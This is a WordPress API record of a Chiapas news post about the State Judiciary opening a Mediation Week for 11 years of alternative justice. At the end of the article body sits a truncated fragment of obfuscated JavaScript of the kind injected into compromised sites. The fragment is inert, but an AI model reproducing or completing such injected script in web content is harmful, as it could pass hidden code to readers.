{"id":5458,"date":"2022-09-28T00:14:17","date_gmt":"2022-09-28T00:14:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5458"},"modified":"2022-09-28T00:14:18","modified_gmt":"2022-09-28T00:14:18","slug":"inaugura-poder-judicial-del-estado-semana-de-la-mediacion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5458","title":{"rendered":"Inaugura Poder Judicial del Estado Semana de la Mediaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"480\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1664323985458.jpg\" alt=\"\" class=\"wp-image-5459\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1664323985458.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1664323985458-300x200.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>&#8211; En conmemoraci\u00f3n a los 11 a\u00f1os de la implementaci\u00f3n de la Justicia Alternativa en el estado se realiza una jornada de capacitaciones.<\/p>\n\n\n\n<p>27 de septiembre del 2022. Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado de Chiapas, dio inicio al ciclo de conferencias de la Semana de la Mediaci\u00f3n Por una cultura de paz, en conmemoraci\u00f3n a los 11 a\u00f1os de la implementaci\u00f3n de la Justicia Alternativa en el estado, a trav\u00e9s del Instituto de Formaci\u00f3n Profesionalizaci\u00f3n y Carrera Judicial y el Centro Estatal de Justicia Alternativa (CEJA), dirigido a barras, colegios, asociaciones, profesionales, estudiantes en derecho y p\u00fablico en general.La Sala de Presidentes del Palacio de Justicia, fue la sede donde se llev\u00f3 a cabo el acto inaugural, donde el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, as\u00ed como titular del Poder Judicial del Estado de Chiapas, Guillermo Ramos P\u00e9rez, acompa\u00f1ado de las consejeras de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores e Itzel Ballinas Barbosa, ofreci\u00f3 las palabras de bienvenida y un mensaje a las y los asistentes, destacando la importancia de la implementaci\u00f3n de la Justicia Alternativa en la entidad, como un modelo de acceso a la justicia pronta, completa e imparcial.Adem\u00e1s, resalt\u00f3 el arduo trabajo que la directora general del Centro Estatal de Justicia Alternativa, Elisheba Goldhaber Pasillas y del personal, quienes est\u00e1n en constante capacitaci\u00f3n en materia de mediaci\u00f3n, conciliaci\u00f3n y arbitraje, para fomentar en nuestro estado la cultura de soluci\u00f3n de controversias de una manera amigable y pac\u00edfica.Al t\u00e9rmino de su mensaje dio por inaugurada la Semana de la Mediaci\u00f3n Por una cultura de la paz, para dar inicio a la primera ponencia, con lo cual agradeci\u00f3 la participaci\u00f3n del destacado ponente, el presidente fundador del Instituto de Mediaci\u00f3n en M\u00e9xico, Jorge Pesqueira Leal, quien aport\u00f3 importantes conocimientos para abonar a la consolidaci\u00f3n del sistema de Justicia en M\u00e9xico en materia de Justicia Restaurativa, para cristalizar los objetivos del Plan de Desarrollo Sostenible 2015-2030.Est\u00e1 jornada contempla adem\u00e1s, conferencias en l\u00ednea, talleres presenciales y c\u00edrculos de di\u00e1logo con especialistas de las subdirecciones del CEJA y un conversatorio con facilitadores de la Fiscal\u00eda General del Estado.Con estas capacitaciones, el Poder Judicial reafirma su compromiso con las y los servidores p\u00fablicos que realizan el quehacer jurisdiccional, llevando a cabo constantes capacitaciones, para ofrecer alternativas de soluci\u00f3n de controversias a la ciudadan\u00eda, a trav\u00e9s de la voluntad, la cooperaci\u00f3n y el di\u00e1logo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>&#8211; En conmemoraci\u00f3n a los 11 a\u00f1os de la implementaci\u00f3n de la Justicia Alternativa en el estado se realiza una jornada de capacitaciones. 27 de septiembre del 2022. Tuxtla Guti\u00e9rrez; Chiapas.- El Poder Judicial del Estado de Chiapas, dio inicio al ciclo de conferencias de la Semana de la Mediaci\u00f3n Por una cultura de paz, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5459,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-5458","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5458","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5458"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5458\/revisions"}],"predecessor-version":[{"id":5460,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5458\/revisions\/5460"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5459"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5458"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5458"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5458"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}